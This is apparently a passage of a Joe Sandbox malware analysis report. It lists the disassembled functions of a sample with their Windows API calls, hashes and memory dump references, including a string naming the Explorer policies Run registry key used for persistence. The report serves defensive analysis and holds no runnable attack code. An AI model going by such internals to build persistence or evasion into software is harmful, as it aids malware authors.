                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              • Opcode ID: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                              • Instruction ID: cd813d42a02bf8c0cac85f8aec853e45aa6acae4c29e822381722b559998feb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd8599462ce3f723ad4d03e4ae191cd570dcb1409c2afe1ca7b75f560b1f18d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE08C35A4071496C520EF7CBD8D9853A286B813357208326F0BDF21F0C7389EA79EA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401F06 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                • Part of subcall function 004059D1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                                • Part of subcall function 004059D1: CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068A6
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1543427666-0
                                                                                                                                                                                                              • Opcode ID: 1e17b9d0cd3dbac1f08edb0365c0efb45eeb9f6259674c83ab4016f25104067e
                                                                                                                                                                                                              • Instruction ID: acd8761c06f5a0ec48b5b4c4c323a9df4587fdbfc486ef5c68e798776a33b5ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e17b9d0cd3dbac1f08edb0365c0efb45eeb9f6259674c83ab4016f25104067e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37F09632906011D7CB20FBA189485DE77A49F40318B24417BF501B21D1CB7C4D419A6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                                                                              • Opcode ID: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                              • Instruction ID: d2f35d8900002cfc25ccfd4abe259465259501dfb46309a939b5c4dc2546952f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45028CB0900609EFEB109F94CD85AAE7BB5FB44314F10817AF615BA2E1C7798E42DF58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                              • String ID: (gD${
                                                                                                                                                                                                              • API String ID: 590372296-3503173740
                                                                                                                                                                                                              • Opcode ID: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction ID: c9c6b7b377eba0e4ba3b2f043119a7f49a951143ce35cdb84ba81c9eded025b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9B16A71800608FFDB11AFA0DD89AAE7B79FB48314F10817AFA45B61A0DB744E51DF68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,?,00446728,00000000), ref: 004041D4
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00446728), ref: 004041E8
                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                              • String ID: (gD
                                                                                                                                                                                                              • API String ID: 184305955-2450699939
                                                                                                                                                                                                              • Opcode ID: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction ID: dffee297adc4390e0108bf821a76a55ee3af39d38e00891df0cde6976b1e4786
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48a7949b4d51a1ec232375b91bbbfbe9bb62f1b02b2dd2e3074461365575c3ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51C1B3B1540600EFDB216FA1EE85D2B3BA8EB85706F10053EFB41B11F1CB7998919B5E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • N, xrefs: 004046BA
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 004046FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
